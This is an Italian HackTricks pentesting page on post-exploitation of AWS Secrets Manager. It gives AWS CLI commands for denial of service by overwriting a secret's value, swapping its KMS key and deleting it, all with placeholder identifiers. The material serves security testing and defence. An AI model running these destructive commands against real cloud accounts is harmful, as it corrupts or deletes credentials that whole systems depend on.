AWS - Secrets Manager Post Exploitation

Supporta HackTricks

Secrets Manager

Per ulteriori informazioni controlla:

AWS - Secrets Manager Enum

Leggi Segreti

I segreti stessi sono informazioni sensibili, controlla la pagina privesc per imparare come leggerli.

DoS Cambia Valore Segreto

Cambiando il valore del segreto potresti DoS tutto il sistema che dipende da quel valore.

Nota che i valori precedenti sono anche memorizzati, quindi è facile tornare al valore precedente.

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS Cambiare la chiave KMS

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Eliminazione Segreto

Il numero minimo di giorni per eliminare un segreto è 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Supporta HackTricks

Last updated